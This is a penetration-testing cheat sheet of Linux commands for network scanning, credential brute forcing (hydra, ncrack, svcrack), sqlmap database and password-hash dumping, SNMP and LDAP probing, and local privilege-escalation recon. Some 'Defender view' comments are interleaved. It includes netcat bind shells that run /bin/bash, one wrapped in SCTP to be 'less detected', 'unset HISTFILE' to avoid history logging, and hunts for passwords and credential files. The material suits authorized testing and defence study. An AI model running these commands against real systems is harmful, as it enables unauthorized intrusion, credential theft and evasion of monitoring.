Penetration Testing Cheat Sheet

Terms of use

All the content and resources have been provided in the hope that they will be useful. The author does not take responsibility for any misapplication of them. The document is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY.


Linux Security Audit Commands



Linux Security Audit Commands:
------------------------------------------------------------
Useful commands to be used over the network for a Linux system
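# traceroute
traceroute 8.8.8.8

# traceroute using ICMP (echo probes instead of the default UDP datagrams)
traceroute -I 8.8.8.8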
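# <host> and <port> are placeholders; they are quoted so that a verbatim
# paste is not parsed by the shell as input/output redirection.

# nmap TCP syn scan, all TCP ports with scripts to all nmap output formats
nmap -sS -sV -sC -v -p- -oA all-tcp-127.0.0.1 127.0.0.1

# nmap reverse DNS resolution
nmap -Pn -sn -R -oA dns-10.1.0.0_16 10.1.0.0/16

# update the nmap scripts
nmap --script-updatedb

# list nmap scripts
ls -la /usr/share/nmap/scripts/

# nmap brute force scripts
# Defender view: these show up as bursts of failed logins from one source;
# lockout thresholds, rate limiting and alerting on failed-auth spikes
# are the matching controls.
nmap -vvv --script http-brute --script-args userdb=users.txt,passdb=pass.txt -p "<port>" "<host>"
nmap --script vmauthd-brute -p "<port>" "<host>"
nmap --script ftp-brute -p "<port>" "<host>"

# help for script
nmap --script-help=ssl-heartbleed

# scan using script
# (the option needs two ASCII hyphens; a typographic dash is not parsed
# as an option by nmap)
nmap -sV --script=ssl-heartbleed.nse -p "<port>" "<host>"

# scan using set of scripts
# The pattern is quoted so the shell does not try to glob it. The wildcard
# also selects intrusive smb-* scripts, not only safe checks.
nmap -sV --script='smb*' -p "<port>" "<host>"

# nmap used as vulnerability scanner
# Clone straight into scripts/vulscan: mkdir + cd + clone would nest the
# repository one level deeper (vulscan/vulscan/) and the --script path
# below would not resolve.
# vulscan is third-party NSE code that runs with nmap's privileges; review
# it and pin a known commit before use.
git clone https://github.com/scipag/vulscan.git /usr/share/nmap/scripts/vulscan
nmap -sV --script=vulscan/vulscan.nse 127.0.0.1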
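# ncrack
# <host>/<port> are placeholders, quoted so the shell does not treat
# them as redirections.
# Defender view: repeated authentication failures for one account from one
# source; lockout, rate limiting and MFA on exposed RDP/SSH blunt this.
ncrack -vv --user root "<host>:<port>"

# ncrack RDP
ncrack -vv -U username.txt -P password.txt "<host>:3389"

# ncrack SSH
ncrack -vv --user root "<host>:22"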
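# hydra
# Placeholders in angle brackets are quoted so the shell does not parse
# them as redirections.
# Defender view: password guessing is visible as a high rate of failed
# logins; per-account and per-source throttling plus alerting on the
# service's auth log are the matching controls.

# Bruteforce SSH
hydra -L "<user-list.txt>" -P "<password-list.txt>" "ssh://<host>"

# Bruteforce IP router over HTTP
hydra -V -l admin -P passwords.txt -t 36 -f -s 80 192.168.1.1 http-get /

# Bruteforce FTP
hydra -V -l admin -P passwords.txt -e ns -f -s 21 192.168.1.1 ftp

# Bruteforce RDP
hydra -t 1 -V -f -l username -P password.lst rdp://192.168.1.1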

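# skipfish
# basic scan
skipfish -o out_dir https://www.host.com

# using cookies to access authenticated pages
# The cookie values are live session tokens: they end up in shell history
# and the process list, so use a dedicated test account and invalidate
# the session afterwards.
skipfish -o out_dir -I urls_to_scan -X urls_not_to_scan \
  -C cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX \
  -C cookie2=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX \
  https://www.host.com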
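# wfuzz
# URLs are quoted: unquoted, "?" is a glob character and "&" would send
# the command to the background and cut the URL short.

# URL brute forcing
wfuzz -c -z file,Directories_Common.wordlist --hc 404 "http://<host>/FUZZ.php"

# GET params brute forcing
wfuzz -c -z file,users.txt -z file,pass.txt --hc 404 "http://<host>/index.php?user=FUZZ&pass=FUZ2Z"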

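# sqlmap
# Defender view: the root cause these commands probe is SQL built by
# string concatenation; parameterized queries and least-privilege database
# accounts are the fix.
sqlmap -u "http://host.com/vulnerable.php?param=12345"

# run a custom query (closing quote of --sql-query restored)
sqlmap -u "http://host.com/vulnerable.php?param=12345" --dbms "Microsoft SQL Server" --sql-query="select name,master.sys.fn_sqlvarbasetostr(password_hash) from master.sys.sql_logins"

# list databases
sqlmap -u "http://host.com/vulnerable.php?param=12345" --dbms "Microsoft SQL Server" --dbs

# dump one table
sqlmap -u "http://host.com/vulnerable.php?param=12345" --dbms "Microsoft SQL Server" --dump -D database -T table

# authenticated request; the cookie is a live session token, handle it as
# a secret
sqlmap -u "http://host.com/vulnerable.php?param=12345" --cookie "cookie1=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"

# replay a saved request from a file and test one field
sqlmap -r POST.txt -p field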
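# Placeholders in angle brackets are quoted so the shell does not parse
# them as redirections.

# My SQL
# -p without a value prompts for the password, which keeps it out of the
# process list and shell history.
mysql -u "<username>" -p --port "<port>" -h "<host>"

# The dump contains every database, including account data; write it to a
# location with restricted permissions.
mysqldump -h "<host>" -u "<username>" -p -f --port "<port>" --events --routines --triggers --all-databases > MySQLData.sql

# Oracle
# A password embedded in the connect string is visible in the process list
# and shell history; leaving out "/password" makes sqlplus prompt for it.
sqlplus "username/password@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=hostname)(PORT=port))(CONNECT_DATA=(SERVER=dedicated)(SERVICE_NAME=servicename)))"

# Postgres
psql -h 127.0.0.1 db_name username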
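# SNMP
# <host>/<port> are placeholders, quoted so the shell does not treat them
# as redirections.
# Defender view: SNMPv1/v2c community strings cross the network in
# cleartext, and "public"/"private" are the well-known defaults. Change or
# disable them, restrict SNMP to management networks, and prefer SNMPv3.

# SNMPv1
snmpwalk -mALL -v1 -cpublic "<host>"
snmpwalk -mALL -v1 -cprivate "<host>"
snmpget -mALL -v1 -cpublic "<host>" sysName.0

# SNMPv2
snmpwalk -v2c -cprivate "<host>:<port>"
snmpget -v2c -cprivate -mALL "<host>" sysName.0 sysObjectID.0 ilomCtrlDateAndTime.0

# A writable community allows configuration changes (here: enabling HTTP
# on the ILOM).
snmpset -mALL -v2c -cprivate "<host>" ilomCtrlHttpEnabled.0 i 1
# expected output:
#   SUN-ILOM-CONTROL-MIB::ilomCtrlHttpEnabled.0 = INTEGER: true(1)

# SNMPv3
# MD5 and DES are the weak legacy choices; where the agent supports it,
# configure SHA authentication and AES privacy instead.
# The -A/-X passphrases on the command line are visible in the process
# list.
snmpwalk -v3 -l authPriv -u snmpadmin -a MD5 -A PaSSword -x DES -X PRIvPassWord "<host>:<port>" system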
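# LDAP
# <host> is a placeholder, quoted so the shell does not treat it as a
# redirection. -h/-p are deprecated in recent OpenLDAP releases in favour
# of -H ldap://host:port.

# anonymous read of the base entry
ldapsearch -x -b "dc=company,dc=com" -s base -h "<host>"

# authenticated search over LDAPS
# LDAPTLS_REQCERT=never turns off server certificate validation, so the
# bind password can be intercepted by a man-in-the-middle; use it only
# where the CA cannot be installed. -W prompts for the password.
LDAPTLS_REQCERT=never ldapsearch -x -D "uid=Name.Surname,OU=People,DC=Company,DC=com" -W -H "ldaps://<host>" -b "uid=Name.Surname,OU=People,DC=Company,DC=com" -s sub

ldapsearch -x -p 389 -h "127.0.0.1" -b "ou=people,dc=company,dc=com" -s sub "objectClass=*"
ldapsearch -x -p 1389 -h "127.0.0.1" -b "dc=company,dc=com" -s one "objectClass=*"

# add entries from an LDIF file
# -w puts the bind password on the command line (process list, shell
# history); -W prompts for it instead.
ldapmodify -a -h "127.0.0.1" -p 389 -D "cn=Directory Manager" -w 'password' -f modify.ldif
# example content of modify.ldif:
#   dn: ou=people,dc=company,dc=com
#   objectClass: top
#   objectClass: organizationalunit
#   ou: people
#   ...

# delete an entry (the tool is "ldapdelete", one word)
ldapdelete -x -D "cn=Directory Manager" -w 'password' -p 1389 -h "127.0.0.1" "uid=identifier,ou=people,dc=company,dc=com"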
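# NFS
# Defender view: an export list that anonymous clients can read and
# exports open to any host are the findings here; restrict exports to
# named clients.
showmount -e 127.0.0.1

# Read-only is "ro" ("r" is not a mount option). nosuid,nodev keep setuid
# bits and device nodes on an export you do not control from being
# honoured locally.
mount -o ro,nosuid,nodev 127.0.0.1:/ /mnt/nfs

# SSHFS
# mount (<host> is a placeholder, quoted so the shell does not treat it as
# a redirection)
sshfs "user@<host>:/remote/path" /mnt/tmp -C -p 22

# unmount
fusermount -u /mnt/tmp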
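# redir
# Placeholders are quoted so the shell does not parse them as
# redirections.
redir --laddr="<listen_address>" --lport="<listen_port>" --caddr="<connect_address>" --cport="<connect_port>"

# sending HTTP post request
curl --data "param1=value1&param2=value2" https://host.com/index.php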
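# sending SOAP request (save the lines below as a standalone script)
#!/bin/sh
# Sends one SOAP envelope to HOST:PORT over plain TCP with netcat.
# The connection is unencrypted, so anything placed in the request is
# readable on the wire.
HOST=host.com
PORT=8888

# The request body is kept in a variable so its length can be announced in
# Content-Length; without that header an HTTP/1.1 server cannot tell where
# the body ends.
body='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://host.com/"> <soapenv:Header/> <soapenv:Body> <web:soapRequest> </web:soapRequest> </soapenv:Body></soapenv:Envelope>'

# NOTE(review): the here-document uses LF line endings; strict servers may
# require CRLF - confirm against the target service.
nc "$HOST" "$PORT" << __EOF__
POST /services/ HTTP/1.1
Host: ${HOST}:${PORT}
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: ${#body}
Connection: close

${body}
__EOF__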
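# Bash like SQL group by (count identical lines, least frequent first)
sort test.txt | uniq -c | sort -n

# Wireshark over SSH
# 'not port 22' keeps the SSH session that carries the capture out of
# the capture itself.
ssh root@192.168.56.101 "sudo tcpdump -U -s0 -i lo -w - 'not port 22'" | wireshark -k -i -

# HEX to PCAP
xxd -r -p test.hex | od -Ax -tx1 | text2pcap - test.pcap

# Parse JSON
# The regex depends on the exact '"field" : ' spacing; where jq is
# installed, `jq '.field' test.json` is the robust form.
grep -Po '"field" : .*?[^\\]",' test.json

# tshark to Elasticsearch output
./tshark -i any -f tcp -T ek -e "ip.addr" -e "tcp.port"

# tshark display filter to files
tshark -r input.pcap -Y "ip.src == 10.1.1.1" -w output.pcap -F pcap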
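# john the ripper over GPU, start session
# Defender view: time-to-crack is set by the hash scheme; slow, salted
# password hashes (bcrypt, scrypt, Argon2) are what make offline guessing
# expensive.
john --session=session_name --format=opencl ~/hash.txt

# john the ripper, continue session
john --restore=session_name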
------------------------------------------------------------
Useful commands to run locally on the Linux system, to quickly analyze the system and possibly help to escalate privileges.
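# Before connecting to the remote system, start recording the interactive
# session; only then connect, e.g. over ssh.
# The typescript captures everything shown on the terminal, including any
# secrets that get printed, so store it accordingly.
# (<filename> is a placeholder, quoted so the shell does not treat it as a
# redirection.)
script "<filename>"

# login
ssh username@hostname

# check current shell
echo "$0"

# unset history file
# Defender view: shell history is not an audit trail. Process-execution
# auditing (e.g. auditd execve rules) and central session recording still
# capture commands after this, and a session without history is itself a
# signal worth alerting on.
unset HISTFILE

# check current user
whoami

# current folder
pwd

# list history of the user
history

# check system
uname -a

# check uptime
uptime

# check system variables
export

# processes
ps -ef

# partitions
df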
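# find in files
# (grep -F / grep -E replace fgrep / egrep, which current GNU grep marks
# as obsolescent)
find . -name "*.java" -type f -exec grep -F -iHn "textToFind" {} \;
find . -regex ".*\.\(c\|java\)" -type f -exec grep -F -iHn "textToFind" {} \;
# "*.conf" is quoted so the shell does not expand it against the current
# directory before find sees it.
find / -maxdepth 4 -name "*.conf" -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null

# SUID files owned by root
# Defender view: compare the result with the distribution's package
# baseline; any setuid-root binary outside it needs an explanation.
find / -uid 0 -perm -4000 -type f 2>/dev/null

# SUID files
find / -perm -4000 -type f 2>/dev/null

# world writable directories
find / -perm -2 -type d 2>/dev/null

# find passwords in files and ignore errors and filter out the proc and
# other folders
# Defender view: the same search works as a self-audit for credentials
# left in configuration files and scripts.
find . 2> /dev/null | grep -F -v proc | grep -F -v lib64
find . ! -path "*/proc/*" -type f -name "*" -exec grep -F -iHn password {} \;

# reverse java jar files and find passwords there
find . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | grep -E -i -e "Location:" -e "password" | uniq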
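# check open ports and services listening
# (on systems without net-tools, `ss -anp` gives the same view)
netstat -anp

# check defined hosts
cat /etc/hosts

# check local IP addresses and interfaces
# (on systems without net-tools: `ip addr`)
ifconfig -a

# check sudo privileges
# Defender view: NOPASSWD entries and commands that can spawn a shell or
# write arbitrary files are the sudoers lines to review.
sudo -l

# check crontab
crontab -l

# check inittab
cat /etc/inittab

# try to sniff traffic
tcpdump
# options go before the filter expression; port 22 is excluded so that the
# own SSH session is not captured. The capture file holds raw traffic and
# may contain credentials.
tcpdump -w trace.pcap not port 22

# check known hosts
cat ~/.ssh/known_hosts

# try access mails
head /var/mail/root

# list groups, users
cat /etc/group
cat /etc/passwd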
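# open netcat listener
# <host>/<port> are placeholders, quoted so the shell does not treat them
# as redirections.

# open tcp listener and execute bash after connect
# Defender view: this is an unauthenticated, unencrypted shell for anyone
# who can reach the port. New listening sockets owned by nc and process
# launches of nc with -e are the events to alert on.
nc -l -p "<port>" -e /bin/bash

# connect to nc
nc "<host>" "<port>"

# use sctp instead of tcp to be less detected
# Defender view: SCTP is IP protocol 132; firewall rules and network
# sensors that only cover TCP and UDP will not see it.
withsctp nc -l -p "<port>" -e /bin/bash
withsctp nc "<host>" "<port>"

# logout
logout

# close script session: press Ctrl + D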
----------------------------------------------------------------------- Custom or any network protocol --------------
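# Copy hex payload from wireshark of the required message

# Send hex payload over network
# xxd -r -p turns the plain hex string back into raw bytes before nc sends
# them.
echo "aabbccddeeff" | xxd -r -p | nc 127.0.0.1 8080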
--------------------------------------------------------------------------------- Telco related -----------------------
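# svmap, send SIP OPTIONS
svmap -p5060,5061,5080-5090 10.0.0.1

# svcrack
# Defender view: guessing against extension 100 appears as repeated failed
# SIP registrations; rate limiting on the registrar and strong
# per-extension secrets are the matching controls.
svcrack -u100 -d dictionary.txt 10.0.0.1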
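# SCTP proxy to send some message
# SCTP payload protocol identifier will be default, not working with all
# servers
# The named pipe carries the return path of the relay.
mkfifo fifo
# (the wrapper is "withsctp", one word)
withsctp nc -l -k -p port_local <fifo | withsctp nc 127.0.0.1 port >fifo
echo "aabbccddeeff" | xxd -r -p | withsctp nc -q 1 127.0.0.1 port_local

# SSH tunnel and TCP to SCTP proxy
# SCTP payload protocol identifier will be default, not working with all
# servers
# Workstation --(SSH)--> sctp_client --(SCTP)--> sctp_server
# Placeholders in angle brackets are quoted so the shell does not parse
# them as redirections; "fifo" is a named pipe created with mkfifo as
# above.
# on sctp_client execute
# NOTE(review): the listener is given no bind address, so it is presumably
# reachable on every interface of sctp_client; the SSH forward only needs
# it on localhost - confirm and restrict if the nc build allows it.
nc -l -k -p port <fifo | withsctp nc -p "<source_port>" "<remote_sctp_server_ip>" "<remote_sctp_server_port>" >fifo
ssh -L port:localhost:port "username@<remote_machine_running_nc>"
# then on workstation TCP connect to localhost:port will be tunneled to
# remote machine over SSH and forwarded to remote_sctp_server over sctp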